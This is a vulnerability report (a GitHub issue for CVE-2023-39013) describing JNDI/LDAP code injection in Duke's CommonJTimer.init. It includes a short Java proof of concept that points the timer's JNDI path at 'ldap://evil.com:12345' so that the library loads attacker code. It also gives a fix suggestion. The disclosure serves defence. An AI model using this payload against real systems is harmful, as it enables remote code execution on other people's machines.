Headline
CVE-2023-39013: There's a code injection vulnerability of `no.priv.garshol.duke.server.CommonJTimer.init` · Issue #273 · larsga/Duke
Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.
Affected Version
The latest version 1.2 and below.
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
Related news
Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.